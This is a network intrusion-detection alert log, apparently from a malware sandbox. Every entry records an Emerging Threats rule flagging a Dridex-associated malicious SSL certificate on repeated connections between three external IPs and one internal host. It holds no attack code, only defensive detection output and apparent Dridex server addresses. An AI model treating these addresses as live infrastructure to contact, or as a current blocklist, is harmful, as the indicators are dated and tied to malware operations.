01/12/21-07:40:27.014090	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49229	80.86.91.27	192.168.2.22
01/12/21-07:40:27.920636	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49230	5.100.228.233	192.168.2.22
01/12/21-07:40:27.920636	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49230	5.100.228.233	192.168.2.22
01/12/21-07:40:30.113730	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49233	77.220.64.37	192.168.2.22
01/12/21-07:40:30.636405	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49234	80.86.91.27	192.168.2.22
01/12/21-07:40:31.158374	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49236	5.100.228.233	192.168.2.22
01/12/21-07:40:31.158374	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49236	5.100.228.233	192.168.2.22
01/12/21-07:40:32.462321	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49238	77.220.64.37	192.168.2.22
01/12/21-07:40:32.977618	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49239	80.86.91.27	192.168.2.22
01/12/21-07:40:33.493844	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49240	5.100.228.233	192.168.2.22
01/12/21-07:40:33.493844	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49240	5.100.228.233	192.168.2.22
01/12/21-07:40:34.535433	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49242	77.220.64.37	192.168.2.22
01/12/21-07:40:35.049541	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49243	80.86.91.27	192.168.2.22
01/12/21-07:40:35.587796	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49244	5.100.228.233	192.168.2.22
01/12/21-07:40:35.587796	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49244	5.100.228.233	192.168.2.22
01/12/21-07:40:36.631721	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49246	77.220.64.37	192.168.2.22
01/12/21-07:40:37.151091	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49247	80.86.91.27	192.168.2.22
01/12/21-07:40:37.679406	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49248	5.100.228.233	192.168.2.22
01/12/21-07:40:37.679406	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49248	5.100.228.233	192.168.2.22
01/12/21-07:40:38.685161	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49250	77.220.64.37	192.168.2.22
01/12/21-07:40:39.195872	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49251	80.86.91.27	192.168.2.22
01/12/21-07:40:39.697057	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49252	5.100.228.233	192.168.2.22
01/12/21-07:40:39.697057	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49252	5.100.228.233	192.168.2.22
01/12/21-07:40:40.730827	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49254	77.220.64.37	192.168.2.22
01/12/21-07:40:41.245867	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49255	80.86.91.27	192.168.2.22
01/12/21-07:40:41.750896	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49256	5.100.228.233	192.168.2.22
01/12/21-07:40:41.750896	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49256	5.100.228.233	192.168.2.22
01/12/21-07:40:42.774067	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49258	77.220.64.37	192.168.2.22
01/12/21-07:40:43.296962	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49259	80.86.91.27	192.168.2.22
01/12/21-07:40:43.811516	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49260	5.100.228.233	192.168.2.22
01/12/21-07:40:43.811516	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49260	5.100.228.233	192.168.2.22
01/12/21-07:40:44.976768	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49262	77.220.64.37	192.168.2.22
01/12/21-07:40:45.829839	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49263	80.86.91.27	192.168.2.22
01/12/21-07:40:46.827773	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49264	5.100.228.233	192.168.2.22
01/12/21-07:40:46.827773	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49264	5.100.228.233	192.168.2.22
01/12/21-07:40:47.942837	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49266	77.220.64.37	192.168.2.22
01/12/21-07:40:48.445080	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49267	80.86.91.27	192.168.2.22
01/12/21-07:40:48.960677	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49268	5.100.228.233	192.168.2.22
01/12/21-07:40:48.960677	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49268	5.100.228.233	192.168.2.22
01/12/21-07:40:50.002373	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49270	77.220.64.37	192.168.2.22
01/12/21-07:40:50.526520	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49271	80.86.91.27	192.168.2.22
01/12/21-07:40:51.054206	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49272	5.100.228.233	192.168.2.22
01/12/21-07:40:51.054206	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49272	5.100.228.233	192.168.2.22
01/12/21-07:40:52.101597	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49274	77.220.64.37	192.168.2.22
01/12/21-07:40:52.613841	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49275	80.86.91.27	192.168.2.22
01/12/21-07:40:53.144173	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49276	5.100.228.233	192.168.2.22
01/12/21-07:40:53.144173	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49276	5.100.228.233	192.168.2.22
01/12/21-07:40:54.177886	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49278	77.220.64.37	192.168.2.22
01/12/21-07:40:54.688968	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49279	80.86.91.27	192.168.2.22
01/12/21-07:40:55.201923	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49280	5.100.228.233	192.168.2.22
01/12/21-07:40:55.201923	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49280	5.100.228.233	192.168.2.22
01/12/21-07:40:56.221548	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49282	77.220.64.37	192.168.2.22
01/12/21-07:40:56.751571	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49283	80.86.91.27	192.168.2.22
01/12/21-07:40:57.255002	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49284	5.100.228.233	192.168.2.22
01/12/21-07:40:57.255002	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49284	5.100.228.233	192.168.2.22
01/12/21-07:40:58.289483	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49286	77.220.64.37	192.168.2.22
01/12/21-07:40:58.810733	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49287	80.86.91.27	192.168.2.22
01/12/21-07:40:59.330128	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49288	5.100.228.233	192.168.2.22
01/12/21-07:40:59.330128	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49288	5.100.228.233	192.168.2.22
01/12/21-07:41:00.361535	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49290	77.220.64.37	192.168.2.22
01/12/21-07:41:00.883725	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49291	80.86.91.27	192.168.2.22
01/12/21-07:41:01.393800	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49292	5.100.228.233	192.168.2.22
01/12/21-07:41:01.393800	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49292	5.100.228.233	192.168.2.22
01/12/21-07:41:02.555784	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49294	77.220.64.37	192.168.2.22
01/12/21-07:41:03.225375	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49295	80.86.91.27	192.168.2.22
01/12/21-07:41:04.101775	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49296	5.100.228.233	192.168.2.22
01/12/21-07:41:04.101775	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49296	5.100.228.233	192.168.2.22
01/12/21-07:41:05.159917	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49298	77.220.64.37	192.168.2.22
01/12/21-07:41:05.674749	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49299	80.86.91.27	192.168.2.22
01/12/21-07:41:06.191113	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49300	5.100.228.233	192.168.2.22
01/12/21-07:41:06.191113	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49300	5.100.228.233	192.168.2.22
01/12/21-07:41:07.252962	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49302	77.220.64.37	192.168.2.22
01/12/21-07:41:07.764923	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49303	80.86.91.27	192.168.2.22
01/12/21-07:41:08.271657	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49304	5.100.228.233	192.168.2.22
01/12/21-07:41:08.271657	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49304	5.100.228.233	192.168.2.22
01/12/21-07:41:09.305661	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49306	77.220.64.37	192.168.2.22
01/12/21-07:41:09.804909	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49307	80.86.91.27	192.168.2.22
01/12/21-07:41:10.328765	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49308	5.100.228.233	192.168.2.22
01/12/21-07:41:10.328765	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49308	5.100.228.233	192.168.2.22
01/12/21-07:41:11.370777	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49310	77.220.64.37	192.168.2.22
01/12/21-07:41:11.881780	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49311	80.86.91.27	192.168.2.22
01/12/21-07:41:12.399154	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49312	5.100.228.233	192.168.2.22
01/12/21-07:41:12.399154	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49312	5.100.228.233	192.168.2.22
01/12/21-07:41:13.430651	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49314	77.220.64.37	192.168.2.22
01/12/21-07:41:13.962265	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49315	80.86.91.27	192.168.2.22
01/12/21-07:41:14.471359	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49316	5.100.228.233	192.168.2.22
01/12/21-07:41:14.471359	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49316	5.100.228.233	192.168.2.22
01/12/21-07:41:15.507911	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49318	77.220.64.37	192.168.2.22
01/12/21-07:41:16.017955	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49319	80.86.91.27	192.168.2.22
01/12/21-07:41:16.526262	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49320	5.100.228.233	192.168.2.22
01/12/21-07:41:16.526262	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49320	5.100.228.233	192.168.2.22
01/12/21-07:41:17.549895	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49322	77.220.64.37	192.168.2.22
01/12/21-07:41:18.061063	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49323	80.86.91.27	192.168.2.22
01/12/21-07:41:18.596816	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49324	5.100.228.233	192.168.2.22
01/12/21-07:41:18.596816	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49324	5.100.228.233	192.168.2.22
01/12/21-07:41:19.650753	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49326	77.220.64.37	192.168.2.22
01/12/21-07:41:20.246706	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49327	80.86.91.27	192.168.2.22
01/12/21-07:41:21.069741	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49328	5.100.228.233	192.168.2.22
01/12/21-07:41:21.069741	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49328	5.100.228.233	192.168.2.22
01/12/21-07:41:22.122326	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49330	77.220.64.37	192.168.2.22
01/12/21-07:41:22.658452	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49331	80.86.91.27	192.168.2.22
01/12/21-07:41:23.182733	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49332	5.100.228.233	192.168.2.22
01/12/21-07:41:23.182733	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49332	5.100.228.233	192.168.2.22
01/12/21-07:41:24.215425	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49334	77.220.64.37	192.168.2.22
01/12/21-07:41:24.739077	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49335	80.86.91.27	192.168.2.22
01/12/21-07:41:25.248721	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49336	5.100.228.233	192.168.2.22
01/12/21-07:41:25.248721	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49336	5.100.228.233	192.168.2.22
01/12/21-07:41:26.255388	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49338	77.220.64.37	192.168.2.22
01/12/21-07:41:26.764994	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49339	80.86.91.27	192.168.2.22
01/12/21-07:41:27.274574	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49340	5.100.228.233	192.168.2.22
01/12/21-07:41:27.274574	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49340	5.100.228.233	192.168.2.22
01/12/21-07:41:28.283557	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49342	77.220.64.37	192.168.2.22
01/12/21-07:41:28.807811	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49343	80.86.91.27	192.168.2.22
01/12/21-07:41:29.329163	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49344	5.100.228.233	192.168.2.22
01/12/21-07:41:29.329163	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49344	5.100.228.233	192.168.2.22
01/12/21-07:41:30.358276	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49346	77.220.64.37	192.168.2.22
01/12/21-07:41:30.871503	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49347	80.86.91.27	192.168.2.22
01/12/21-07:41:31.379307	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49348	5.100.228.233	192.168.2.22
01/12/21-07:41:31.379307	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49348	5.100.228.233	192.168.2.22
01/12/21-07:41:32.385092	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49350	77.220.64.37	192.168.2.22
01/12/21-07:41:32.895054	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49351	80.86.91.27	192.168.2.22
01/12/21-07:41:33.403843	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49352	5.100.228.233	192.168.2.22
01/12/21-07:41:33.403843	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49352	5.100.228.233	192.168.2.22
01/12/21-07:41:34.450143	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49354	77.220.64.37	192.168.2.22
01/12/21-07:41:35.332941	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49355	80.86.91.27	192.168.2.22
01/12/21-07:41:35.858167	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49356	5.100.228.233	192.168.2.22
01/12/21-07:41:35.858167	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49356	5.100.228.233	192.168.2.22
01/12/21-07:41:36.894236	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49358	77.220.64.37	192.168.2.22
01/12/21-07:41:37.427318	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49359	80.86.91.27	192.168.2.22
01/12/21-07:41:37.960157	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49360	5.100.228.233	192.168.2.22
01/12/21-07:41:37.960157	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49360	5.100.228.233	192.168.2.22
01/12/21-07:41:39.306800	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49362	77.220.64.37	192.168.2.22
01/12/21-07:41:39.827898	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49363	80.86.91.27	192.168.2.22
01/12/21-07:41:40.345753	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49364	5.100.228.233	192.168.2.22
01/12/21-07:41:40.345753	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49364	5.100.228.233	192.168.2.22
01/12/21-07:41:41.457152	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49366	77.220.64.37	192.168.2.22
01/12/21-07:41:42.008408	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49367	80.86.91.27	192.168.2.22
01/12/21-07:41:42.533262	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49368	5.100.228.233	192.168.2.22
01/12/21-07:41:42.533262	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49368	5.100.228.233	192.168.2.22
01/12/21-07:41:43.569616	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49370	77.220.64.37	192.168.2.22
01/12/21-07:41:44.092876	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49371	80.86.91.27	192.168.2.22
01/12/21-07:41:44.599102	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49372	5.100.228.233	192.168.2.22
01/12/21-07:41:44.599102	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49372	5.100.228.233	192.168.2.22
01/12/21-07:41:45.630964	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49374	77.220.64.37	192.168.2.22
01/12/21-07:41:46.144235	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49375	80.86.91.27	192.168.2.22
01/12/21-07:41:46.650029	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49376	5.100.228.233	192.168.2.22
01/12/21-07:41:46.650029	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49376	5.100.228.233	192.168.2.22
01/12/21-07:41:47.679960	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49378	77.220.64.37	192.168.2.22
01/12/21-07:41:48.204647	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49379	80.86.91.27	192.168.2.22
01/12/21-07:41:48.713113	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49380	5.100.228.233	192.168.2.22
01/12/21-07:41:48.713113	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49380	5.100.228.233	192.168.2.22
01/12/21-07:41:49.740036	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49382	77.220.64.37	192.168.2.22
01/12/21-07:41:50.282849	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49383	80.86.91.27	192.168.2.22
01/12/21-07:41:50.810903	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49384	5.100.228.233	192.168.2.22
01/12/21-07:41:50.810903	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49384	5.100.228.233	192.168.2.22
01/12/21-07:41:51.841462	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49386	77.220.64.37	192.168.2.22
01/12/21-07:41:52.369234	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49387	80.86.91.27	192.168.2.22
01/12/21-07:41:52.877261	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49388	5.100.228.233	192.168.2.22
01/12/21-07:41:52.877261	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49388	5.100.228.233	192.168.2.22
01/12/21-07:41:53.904021	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49390	77.220.64.37	192.168.2.22
01/12/21-07:41:54.426840	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49391	80.86.91.27	192.168.2.22
01/12/21-07:41:54.948754	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49392	5.100.228.233	192.168.2.22
01/12/21-07:41:54.948754	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49392	5.100.228.233	192.168.2.22
01/12/21-07:41:55.980370	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49394	77.220.64.37	192.168.2.22
01/12/21-07:41:56.511843	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49395	80.86.91.27	192.168.2.22
01/12/21-07:41:57.028666	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49396	5.100.228.233	192.168.2.22
01/12/21-07:41:57.028666	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49396	5.100.228.233	192.168.2.22
01/12/21-07:41:58.081725	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49398	77.220.64.37	192.168.2.22
01/12/21-07:41:58.590307	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49399	80.86.91.27	192.168.2.22
01/12/21-07:41:59.116435	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49400	5.100.228.233	192.168.2.22
01/12/21-07:41:59.116435	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49400	5.100.228.233	192.168.2.22
01/12/21-07:42:00.176278	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49402	77.220.64.37	192.168.2.22
